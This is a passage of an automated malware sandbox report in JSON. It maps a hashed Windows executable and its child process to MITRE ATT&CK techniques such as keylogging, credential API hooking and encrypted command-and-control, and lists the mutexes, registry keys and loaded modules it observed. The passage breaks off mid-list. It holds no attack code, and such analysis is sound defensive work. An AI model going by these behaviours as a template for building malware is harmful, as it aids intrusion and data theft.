"https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 3, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 2}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Clipboard Data", "attck_id": "T1115", "attck_id_wiki": "https://attack.mitre.org/techniques/T1115", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Credential API Hooking", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Automated Collection", "attck_id": "T1119", "attck_id_wiki": "https://attack.mitre.org/techniques/T1119", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 1, "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "suspicious_identifiers_count": 1, "informative_identifiers_count": 3}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Non-Standard Port", "attck_id": "T1571", "attck_id_wiki": "https://attack.mitre.org/techniques/T1571", "malicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Symmetric Cryptography", "attck_id": "T1573.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/001", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "suspicious_identifiers_count": 1, "informative_identifiers_count": 6}, {"tactic": "Impact", "technique": "System Shutdown/Reboot", "attck_id": "T1529", "attck_id_wiki": "https://attack.mitre.org/techniques/T1529", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "informative_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Ðìê-HQT17V\"\n \"\\Sessions\\1\\BaseNamedObjects\\_SHuassist.mtx\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex\"\n \"\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex\"\n \"Local\\ZonesLockedCacheCounterMutex\"\n \"Ðìê-HQT17V\"\n \"Local\\ZonesCacheCounterMutex\"\n \"_SHuassist.mtx\"\n \"\\Sessions\\1\\BaseNamedObjects\\Ðìê-HQT17V-W\"\n \"Ðìê-HQT17V-W\"", "origin": "Created Mutant", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Computer\" (Path: \"HKCU\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Memory Mapped Cache Mgr\" (Path: \"HKCU\\CLSID\\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"UsersFiles\" (Path: \"HKCU\\CLSID\\{59031A47-3F72-44A7-89C5-5595FE6B30EE}\\SHELLFOLDER\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Property System Both Class Factory\" (Path: \"HKCU\\CLSID\\{76765B11-3F95-4AF2-AC9D-EA55D8994F1A}\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"delegate folder that appears in Users Files Folder\" (Path: \"HKCU\\CLSID\\{DFFACDC5-679F-4156-8947-C5C76BC0B67F}\\SHELLFOLDER\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Shell File System Folder\" (Path: \"HKCU\\CLSID\\{0E5AAE11-A475-4C5B-AB00-C66DE400274E}\\INPROCSERVER32\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Previous Versions Property Page\" (Path: \"HKCU\\CLSID\\{596AB062-B4D2-4215-9F74-E9109B0A8153}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Microsoft SendTo Service\" (Path: \"HKCU\\CLSID\\{7BA4C740-9E81-11CF-99D3-00AA004AE837}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Copy as Path Menu\" (Path: \"HKCU\\CLSID\\{F3D06E7C-1E45-4A26-847E-F9FCDEE59BE0}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Start Menu Pin\" (Path: \"HKCU\\CLSID\\{A2A9545D-A0C2-42B4-9708-A0B2BADD77C8}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Start Menu Cache\" (Path: \"HKCU\\CLSID\\{660B90C8-73A9-4B58-8CAE-355B7F55341B}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Taskband Pin\" (Path: \"HKCU\\CLSID\\{90AA3A4E-1CBA-4233-B8BB-535773D48449}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Shortcut\" (Path: \"HKCU\\CLSID\\{00021401-0000-0000-C000-000000000046}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Internet Shortcut\" (Path: \"HKCU\\CLSID\\{FBF23B40-E3F0-101B-8488-00AA003E56F8}\\IMPLEMENTED CATEGORIES\\{00021490-0000-0000-C000-000000000046}\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"User Pinned\" (Path: \"HKCU\\CLSID\\{1F3427C8-5C10-4210-AA03-2EE45287D668}\\SHELLFOLDER\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"User Assist\" (Path: \"HKCU\\CLSID\\{DD313E04-FEFF-11D1-8ECD-0000F87A470C}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Shared Task Scheduler\" (Path: \"HKCU\\CLSID\\{603D3801-BD81-11D0-A3A5-00C04FD706EC}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Groove GFS Context Menu Handler\" (Path: \"HKCU\\CLSID\\{6C467336-8281-4E60-8204-430CED96822D}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Shell extensions for sharing\" (Path: \"HKCU\\CLSID\\{F81E9010-6EA4-11CE-A7FF-00AA003CA9F6}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Share Command State Handler\" (Path: \"HKCU\\CLSID\\{7B4A83B6-F704-4B77-8E3D-C6087E3A21D2}\\INPROCSERVER32\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Sharing Configuration Manager\" (Path: \"HKCU\\CLSID\\{49F371E1-8C5C-4D9C-9A3B-54A6827F513C}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Encryption Context Menu\" (Path: \"HKCU\\CLSID\\{A470F8CF-A1E8-4F65-8335-227475AA5C46}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Open With Context Menu Handler\" (Path: \"HKCU\\CLSID\\{09799AFB-AD67-11D1-ABCD-00C04FC30936}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Briefcase\" (Path: \"HKCU\\CLSID\\{85BBD920-42A0-1069-A2E4-08002B30309D}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"7-Zip Shell Extension\" (Path: \"HKCU\\CLSID\\{23170F69-40C1-278A-1000-000100020000}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"CompatContextMenu Class\" (Path: \"HKCU\\CLSID\\{1D27F844-3A1F-4410-85AC-14651078412D}\\SHELLEX\\NOADDTORECENT\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Remove Properties Drop Target\" (Path: \"HKCU\\CLSID\\{09A28848-0E97-4CEF-B950-CEA037161155}\\SUPPORTEDPROTOCOLS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Security Manager\" (Path: \"HKCU\\CLSID\\{7B8A2D94-0AC9-11D1-896C-00C04FB6BFC4}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Offline Files Cache Control\" (Path: \"HKCU\\CLSID\\{48C6BE7C-3871-43CC-B46F-1449A1BB2FF3}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Offline Files Service Control\" (Path: \"HKCU\\CLSID\\{69486DD6-C19F-42E8-B508-A53F9F8E67B8}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{EFB23A09-A867-4BE8-83A6-86969A7D0856}\\TREATAS\")\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" touched \"Offline Files Setting Object\" (Path: \"HKCU\\CLSID\\{FD3659E9-A920-4123-AD64-7FC76C7AACDF}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74210000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"ADVAPI32.DLL\" at base 76df0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"PROPSYS.DLL\" at base 74360000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"OLE32.DLL\" at base 76710000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"COMCTL32.DLL\" at base 745a0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"OLEAUT32.DLL\" at base 77450000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"SHELL32.DLL\" at base 759f0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"CLBCATQ.DLL\" at base 77960000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74360000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"NTMARTA.DLL\" at base 74b10000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76640000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"PROFAPI.DLL\" at base 756b0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"APPHELP.DLL\" at base 75550000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6fca0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 759f0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ea0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"SETUPAPI.DLL\" at base 76ab0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"RPCRT4.DLL\" at base 776f0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TWEXT.DLL\" at base 6cee0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCUI.DLL\" at base 6c3b0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"CSCAPI.DLL\" at base 70ae0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76640000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76640000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCOBJ.DLL\" at base 6c7d0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76640000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"CRYPTSP.DLL\" at base 750b0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e40000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"CRYPTBASE.DLL\" at base 755a0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75640000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"USERENV.DLL\" at base 757c0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%PROGRAMFILES%\\MICROS~3\\OFFICE14\\GROOVEEX.DLL\" at base 6f430000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\CULTURES\\OFFICE.ODF\" at base 6f010000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTSHRUI.DLL\" at base 72590000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"SRVCLI.DLL\" at base 752a0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"SLC.DLL\" at base 73a50000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"IMM32.DLL\" at base 778f0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SYNCUI.DLL\" at base 6ce20000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%PROGRAMFILES%\\7-ZIP\\7-ZIP.DLL\" at base 10000000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%LOCALAPPDATA%\\MICROSOFT\\ONEDRIVE\\17.3.4604.0120\\FILESYNCSHELL.DLL\" at base 708b0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ACPPAGE.DLL\" at base 6df60000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"DEVRTL.DLL\" at base 74e20000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76c50000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"SECUR32.DLL\" at base 753d0000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75830000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70470000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75550000\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" loaded module \"NETUTILS.DLL\" at base 74200000\n \"app.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70cf0000\n \"app.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"app.exe\" loaded module \"KERNEL32\" at base 76ea0000\n \"app.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"app.exe\" loaded module \"IPHLPAPI\" at base 73a10000\n \"app.exe\" loaded module \"ADVAPI32.DLL\" at base 76df0000\n \"app.exe\" loaded module \"SSPICLI.DLL\" at base 75530000\n \"app.exe\" loaded module \"RPCRT4.DLL\" at base 776f0000\n \"app.exe\" loaded module \"API-MS-WIN-CORE-SYSINFO-L1-2-1\" at base 0\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75550000\n \"app.exe\" loaded module \"KERNEL32.DLL\" at base 76ea0000\n \"app.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 1480000\n \"app.exe\" loaded module \"%WINDIR%\\TEMP\\VXSSL32.DLL\" at base 14d0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WS2_32\" at base 772b0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSWSOCK.DLL\" at base 75070000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\WSHTCPIP.DLL\" at base 74bd0000\n \"app.exe\" loaded module \"CRYPTSP.DLL\" at base 750b0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 74e40000\n \"app.exe\" loaded module \"CRYPTBASE.DLL\" at base 755a0000\n \"app.exe\" loaded module \"COMCTL32.DLL\" at base 745a0000\n \"app.exe\" loaded module \"OLEAUT32.DLL\" at base 77450000\n \"app.exe\" loaded module \"SHELL32.DLL\" at base 759f0000\n \"app.exe\" loaded module \"CLBCATQ.DLL\" at base 77960000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 74360000\n \"app.exe\" loaded module \"NTMARTA.DLL\" at base 74b10000\n \"app.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 76640000\n \"app.exe\" loaded module \"PROFAPI.DLL\" at base 756b0000\n \"app.exe\" loaded module \"APPHELP.DLL\" at base 75550000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6fca0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 759f0000\n \"app.exe\" loaded module \"PROPSYS.DLL\" at base 74360000\n \"app.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 76ea0000\n \"app.exe\" loaded module \"SETUPAPI.DLL\" at base 76ab0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TWEXT.DLL\" at base 6c980000\n \"app.exe\" loaded module \"OLE32.DLL\" at base 76710000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCUI.DLL\" at base 6c3b0000\n \"app.exe\" loaded module \"CSCAPI.DLL\" at base 70ae0000\n \"app.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L1-1-0.DLL\" at base 76640000\n \"app.exe\" loaded module \"API-MS-WIN-SERVICE-MANAGEMENT-L2-1-0.DLL\" at base 76640000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\CSCOBJ.DLL\" at base 6c7d0000\n \"app.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 76640000\n \"app.exe\" loaded module \"RPCRTREMOTE.DLL\" at base 75640000\n \"app.exe\" loaded module \"USERENV.DLL\" at base 757c0000\n \"app.exe\" loaded module \"%PROGRAMFILES%\\MICROS~3\\OFFICE14\\GROOVEEX.DLL\" at base 6f430000\n \"app.exe\" loaded module \"%PROGRAMFILES%\\COMMON~1\\MICROS~1\\OFFICE14\\CULTURES\\OFFICE.ODF\" at base 6f010000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\NTSHRUI.DLL\" at base 72590000\n \"app.exe\" loaded module \"SRVCLI.DLL\" at base 752a0000\n \"app.exe\" loaded module \"SLC.DLL\" at base 73a50000\n \"app.exe\" loaded module \"IMM32.DLL\" at base 778f0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SYNCUI.DLL\" at base 6ce20000\n \"app.exe\" loaded module \"%PROGRAMFILES%\\7-ZIP\\7-ZIP.DLL\" at base 10000000\n \"app.exe\" loaded module \"%LOCALAPPDATA%\\MICROSOFT\\ONEDRIVE\\17.3.4604.0120\\FILESYNCSHELL.DLL\" at base 708b0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ACPPAGE.DLL\" at base 6dd80000\n \"app.exe\" loaded module \"DEVRTL.DLL\" at base 74e20000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76c50000\n \"app.exe\" loaded module \"SECUR32.DLL\" at base 753d0000\n \"app.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 75830000\n \"app.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 70470000\n \"app.exe\" loaded module \"NETUTILS.DLL\" at base 74200000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TWEXT.DLL\" at base 6ce20000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SYNCUI.DLL\" at base 6c980000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\ACPPAGE.DLL\" at base 6df60000\n \"app.exe\" loaded module \"USER32\" at base 77550000\n \"app.exe\" loaded module \"NTDLL\" at base 777a0000\n \"app.exe\" loaded module \"SHELL32\" at base 759f0000\n \"app.exe\" loaded module \"SHLWAPI\" at base 772f0000\n \"app.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 74210000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004436)\n \"fa1c16a3024d35ebc4f6996d1791ead89a08dae2ebd87e39c9997c04613c4645.exe\" called \"GetProcAddress\" with a parameter RegisterTraceGuidsW (UID: 00000000-00004436)\n 